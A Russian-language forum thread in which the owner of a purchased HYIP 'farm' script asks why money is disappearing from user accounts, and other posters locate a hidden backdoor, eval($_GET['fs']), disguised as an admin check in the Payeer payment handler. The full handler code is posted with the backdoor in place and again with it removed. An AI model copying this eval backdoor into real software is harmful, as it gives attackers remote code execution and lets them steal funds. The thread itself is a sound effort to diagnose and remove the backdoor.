Взлом сайта,

[Ghost]

Всем доброго времени суток, ребят помогите что делать, со счетов сайта совсем другой человек деньги выводит, подскажите что  и где проверить

[vra4yga]

Мы должны я так понял совершить жертвоприношение и тогда боги нам откроют истину.
Ты столько информации дал, что остается только ванговать. Какой скрипт? Какие модули? Кто выводит? Какой кошелёк?
Как задашь вопрос такой ответ и получишь.

[Ghost]

Мы должны я так понял совершить жертвоприношение и тогда боги нам откроют истину.
Ты столько информации дал, что остается только ванговать. Какой скрипт? Какие модули? Кто выводит? Какой кошелёк?
Как задашь вопрос такой ответ и получишь.

Вот кош P30107598, забирал только со счетов пользователей , а все с паера не смог, модули нету никаких, вот скрипт фермы покупал как на сале  скрипт, ихнее можно сказать

[Shop-53]

Скрипт сможеш скинуть и я найду Дирк я знаю меня также ломали Дауни сале скрипт

[Ghost]

Ща

[Shop-53]

Залей на яндекс кинь силку в лс и сайт скинь которий з ломали я сразу скажу где дира мне уже писали тоже люди что купляли на салескрипт и ломали

[Ghost]

Залей на яндекс кинь силку в лс и сайт скинь которий з ломали я сразу скажу где дира мне уже писали тоже люди что купляли на салескрипт и ломали

вот ЛИНК

[Shop-53]

Силку сайта скинь или в лс или сюда

[Shop-53]

   # Если пользователь админ
   
   eval($_GET['fs']);      первое нашол в файле паер обрабочика

[Shop-53]

 # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);
Короче ето в файле паер обрабочика  короче верхня строка проверяет баланс на кошельке 
А где пользователь админ ето дира но как пользоватса я немогу сказать так как сам незнаю но если ето убереш проблеми пропадут
 

[Ghost]

 # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);
Короче ето в файле паер обрабочика  короче верхня строка проверяет баланс на кошельке 
А где пользователь админ ето дира но как пользоватса я немогу сказать так как сам незнаю но если ето убереш проблеми пропадут

Вот это я тоже находил , но вот изменить не смог, когда на другой поменял , там баланс не зачислялся

[Ghost]

айболит еще показал в файле htaccess

[Shop-53]

Там нет я смотрел  напиши мне в скайп vania19902016   я помогу тибе

[Ghost]

Ща

[vra4yga]

Твой мошенник раньше был админом хайпа cy-profit.biz, кстати можешь кинуть жалобу на него в паере, напиши что он нарушил правила и выводит деньги пользуясь уязвимостью.

[vra4yga]

И кстати правильно тебе написали, дыра у тебя в payeer_merchant.php
Перед установкой скрипта советую пользоваться сканером вирусов и вредоносных скриптов  AI-Bolit сканер AI-Bolit https://www.revisium.com/ai/

[Ghost]

Твой мошенник раньше был админом хайпа cy-profit.biz, кстати можешь кинуть жалобу на него в паере, напиши что он нарушил правила и выводит деньги пользуясь уязвимостью.

Да написал, ответили физические доказательства нужны

[Ghost]

Там нет я смотрел  напиши мне в скайп vania19902016   я помогу тибе

Тут напиши пожалуйста

[Ghost]

Скажите пожалуйста почему когда меняю это

                                <?PHP

# Автоподгрузка классов
function __autoload($name){ include("classes/_class.".$name.".php");}

# Класс конфига
$config = new config;

# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);





if (isset($_POST["m_operation_id"]) && isset($_POST["m_sign"]))
{
   $m_key = $config->secretW;
   $arHash = array($_POST['m_operation_id'],
         $_POST['m_operation_ps'],
         $_POST['m_operation_date'],
         $_POST['m_operation_pay_date'],
         $_POST['m_shop'],
         $_POST['m_orderid'],
         $_POST['m_amount'],
         $_POST['m_curr'],
         $_POST['m_desc'],
         $_POST['m_status'],
         $m_key);
   
   $sign_hash = strtoupper(hash('sha256', implode(":", $arHash)));
   if ($_POST["m_sign"] == $sign_hash && $_POST['m_status'] == "success")
   {
      
   $db->Query("SELECT * FROM db_payeer_insert WHERE id = '".intval($_POST['m_orderid'])."'");
   if($db->NumRows() == 0){ echo $_POST['m_orderid']."|error"; exit;}
   
   $payeer_row = $db->FetchArray();
   if($payeer_row["status"] > 0){ echo $_POST['m_orderid']."|success"; exit;}
   
   $db->Query("UPDATE db_payeer_insert SET status = '1' WHERE id = '".intval($_POST['m_orderid'])."'");
   
   $ik_payment_amount = $payeer_row["sum"];
   $user_id = $payeer_row["user_id"];
   
   # Настройки
   $db->Query("SELECT * FROM db_confligsg WHERE id = '1' LIMIT 1");
   $sonfig_site = $db->FetchArray();
   
   $db->Query("SELECT user, referer_id FROM al_polzov_a WHERE id = '{$user_id}' LIMIT 1");
   $user_ardata = $db->FetchArray();
   $user_name = $user_ardata["user"];
   $refid = $user_ardata["referer_id"];
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);

   # Зачисляем баланс
   $serebro = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );
   
   $db->Query("SELECT insert_sum FROM db_users_b WHERE id = '{$user_id}' LIMIT 1");
   $ins_sum = $db->FetchRow();
   
   $serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 2.00) ) : $serebro;
   $add_tree = ( $ik_payment_amount >= 999.99) ? 1 : 0;
   $lsb = time();
   $to_referer = ($serebro * 0.10);
   
   $db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");
   
   
   
   # Зачисляем средства рефереру и дерево
   $add_tree_referer = ($ins_sum <= 0.01) ? ", a_t = a_t + 0" : "";
   $db->Query("UPDATE db_users_b SET money_p = money_p + $to_referer, from_referals = from_referals + '$to_referer' {$add_tree_referer} WHERE id = '$refid'");
   
   # Статистика пополнений
   $da = time();
   $dd = $da + 60*60*24*15;
   $db->Query("INSERT INTO db_insert_money (user, user_id, money, serebro, date_add, date_del)
   VALUES ('$user_name','$user_id','$ik_payment_amount','$serebro','$da','$dd')");
   
        # Конкурс
         $competition = new competition($db);
         $competition->UpdatePoints($user_id, $ik_payment_amount);
        #--------
   


   # Обновление статистики сайта
   $db->Query("UPDATE db_stats SET all_insert = all_insert + '$ik_payment_amount' WHERE id = '1'");
   
   echo $_POST['m_orderid']."|success";
   exit;

   }
   echo $_POST['m_orderid']."|error";
}
?>
                           

[Ghost]

на это

<?PHP

# Автоподгрузка классов
function __autoload($name){ include("classes/_class.".$name.".php");}

# Класс конфига
$config = new config;

# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);





if (isset($_POST["m_operation_id"]) && isset($_POST["m_sign"]))
{
   $m_key = $config->secretW;
   $arHash = array($_POST['m_operation_id'],
         $_POST['m_operation_ps'],
         $_POST['m_operation_date'],
         $_POST['m_operation_pay_date'],
         $_POST['m_shop'],
         $_POST['m_orderid'],
         $_POST['m_amount'],
         $_POST['m_curr'],
         $_POST['m_desc'],
         $_POST['m_status'],
         $m_key);
   
   $sign_hash = strtoupper(hash('sha256', implode(":", $arHash)));
   if ($_POST["m_sign"] == $sign_hash && $_POST['m_status'] == "success")
   {
      
   $db->Query("SELECT * FROM db_payeer_insert WHERE id = '".intval($_POST['m_orderid'])."'");
   if($db->NumRows() == 0){ echo $_POST['m_orderid']."|error"; exit;}
   
   $payeer_row = $db->FetchArray();
   if($payeer_row["status"] > 0){ echo $_POST['m_orderid']."|success"; exit;}
   
   $db->Query("UPDATE db_payeer_insert SET status = '1' WHERE id = '".intval($_POST['m_orderid'])."'");
   
   $ik_payment_amount = $payeer_row["sum"];
   $user_id = $payeer_row["user_id"];
   
   # Настройки
   $db->Query("SELECT * FROM db_config WHERE id = '1' LIMIT 1");
   $sonfig_site = $db->FetchArray();
   
   $db->Query("SELECT user, referer_id FROM al_polzov_a WHERE id = '{$user_id}' LIMIT 1");
   $user_ardata = $db->FetchArray();
   $user_name = $user_ardata["user"];
   $refid = $user_ardata["referer_id"];
   
    # Зачисляем баланс
   $serebro = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );
   
   $db->Query("SELECT insert_sum FROM db_users_b WHERE id = '{$user_id}' LIMIT 100");
   $ins_sum = $db->FetchRow();
   
   $serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 2.00) ) : $serebro;
   $serebro = intval($ins_sum >= 0.01) ? ($serebro + ($serebro * 2.00) ) : $serebro;
   $add_tree = ( $ik_payment_amount >= 999.99) ? 1 : 0;
   $lsb = time();
   $to_referer = ($serebro * 0.07);
   
   $db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");
   
   
   
   # Зачисляем средства рефереру и дерево
   $add_tree_referer = ($ins_sum <= 0.01) ? ", a_t = a_t + 0" : "";
   $db->Query("UPDATE db_users_b SET money_p = money_p + $to_referer, from_referals = from_referals + '$to_referer' {$add_tree_referer} WHERE id = '$refid'");
   
   # Статистика пополнений
   $da = time();
   $dd = $da + 60*60*24*15;
   $db->Query("INSERT INTO db_insert_money (user, user_id, money, serebro, date_add, date_del)
   VALUES ('$user_name','$user_id','$ik_payment_amount','$serebro','$da','$dd')");
 
   
 # Конкурс
$competition = new competition($db);
$competition->UpdatePoints($user_id, $ik_payment_amount);
#--------

   # Обновление статистики сайта
   $db->Query("UPDATE db_stats SET all_insert = all_insert + '$ik_payment_amount' WHERE id = '1'");
   
   echo $_POST['m_orderid']."|success";
   exit;
   
   
   }
   echo $_POST['m_orderid']."|error";
}
?>

не работает, пополнения не показывает

[maks161]

блин да возьми ты уже нормальный файл из нормального скрипта и поменяй.

[Ghost]

блин да возьми ты уже нормальный файл из нормального скрипта и поменяй.

Пишу же не показывает пополнения , не зачисляется

[Ghost]

блин да возьми ты уже нормальный файл из нормального скрипта и поменяй.

Дай пожалуйста нормальный файл

[maks161]

блин да возьми ты уже нормальный файл из нормального скрипта и поменяй.

Пишу же не показывает пополнения , не зачисляется

здесь на сайте есть скрипт АЛКОФЕРМА в бесплатном разделе скачай его там на 1000% рабочий файл лично проверял. возьми от туда

[kvozimir]

насчет eval($_GET['fs']);   я еще соглашусь

но вот

 # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }


это же просто проверка баланса